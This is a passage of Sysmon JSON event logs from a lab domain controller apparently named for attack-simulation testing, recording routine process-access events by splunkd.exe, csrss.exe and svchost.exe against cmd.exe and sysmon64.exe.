AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2155,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001054E20300}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001054E20300}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2156,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001054E20300}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001054E20300}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2157,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2158,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2159,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2160,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2161,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2162,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
